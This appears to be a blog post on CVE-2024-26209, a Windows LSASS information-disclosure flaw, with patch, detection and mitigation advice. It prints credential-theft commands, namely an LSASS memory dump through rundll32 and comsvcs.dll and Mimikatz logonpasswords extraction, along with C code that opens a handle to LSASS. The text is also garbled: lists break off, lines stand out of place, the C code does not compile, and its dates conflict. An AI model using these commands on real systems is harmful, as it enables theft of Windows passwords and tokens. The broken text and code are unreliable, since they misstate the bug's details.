---
Introduction
On March 12, 2024, Microsoft published a security advisory about a vulnerability labeled CVE-2024-26209 in the Local Security Authority Subsystem Service (LSASS). This is an information disclosure vulnerability, which means bad actors can grab sensitive info from vulnerable Windows machines. In this long read, we’ll break down how the bug works, who’s at risk, and give you technical details, links to the advisory, and a proof-of-concept code snippet to understand it better.
> Note: This article is for educational purposes only. Any malicious use of this info is strictly prohibited.
What is LSASS?
LSASS stands for Local Security Authority Subsystem Service. It’s a critical Windows process (lsass.exe) responsible for:
Creation of access tokens
If attackers compromise LSASS, they can dump passwords or authentication tokens and move through the network undetected.
Patched on: March 2024 Patch Tuesday
Summary: The vulnerability allows a local attacker (already on the system) to access sensitive information processed by LSASS that shouldn’t normally be accessible.
Official Advisory
- Microsoft Security Update Guide for CVE-2024-26209
Windows 11
- Windows Server 2016/2019/2022
Check your patch level — if it's before March 2024, your system is likely vulnerable.
How Does the Exploit Work?
According to Microsoft, the bug allows a local user to query LSASS in a way that leaks memory information.
Typical Attack Steps
1. Attacker gains access to a Windows machine (physical or remote via RDP/malware).
One popular technique for abusing LSASS weaknesses is dumping its memory to extract secrets
# WARNING: Don't use on non-lab systems.
# Dumps LSASS memory for analysis
$pid = (Get-Process -Name lsass).Id
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $pid C:\temp\lsass.dmp full
After dumping, attackers can use Mimikatz to extract credentials
# On attacker's machine
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords"
Code Snippet: Minimal Access in C
Here’s a C code snippet illustrating how easy it might be for low-privileged users to gain a handle to LSASS memory. (Modern patches should prevent this now.)
#include <windows.h>
#include <stdio.h>
int main() {
DWORD pid;
HANDLE hProcess;
printf("Enter LSASS PID: ");
scanf("%ld", &pid);
hProcess = OpenProcess(PROCESS_VM_READ, FALSE, pid);
if (hProcess == NULL) {
printf("Could not open process: %ld\n", GetLastError());
return 1;
}
// ReadProcessMemory can be used here for further dumping
printf("Handle acquired! (not safe if patched)\n");
CloseHandle(hProcess);
return ;
}
Added stricter memory handle access controls.
Mitigation:
Limit admin rights.
- Use LSASS as a protected process in enterprise settings (see here).
Tools like Mimikatz, Pypykatz, or custom scripts present.
Forensic tip:
Check event logs for Event ID 4656 with Object Type Process and Process Name matching lsass.exe.
References and Further Reading
- Microsoft CVE-2024-26209 Advisory
- MSRC Blog: March 2024 Patch Tuesday
- Mimikatz Password Extraction
- Windows LSA protection best practices
- Detecting LSASS Dumps
Conclusion
CVE-2024-26209 is a classic but serious “info leak” flaw, as it targets the heart of Windows authentication. Patch ASAP, monitor for process access anomalies, and ensure LSASS is protected. This is how you keep attackers from snatching up your company’s keys to the kingdom!
For more deep dives, follow security advisories and always keep your systems up to date. Stay safe!
Timeline
Published on: 04/09/2024 17:15:39 UTC
Last modified on: 04/10/2024 13:24:00 UTC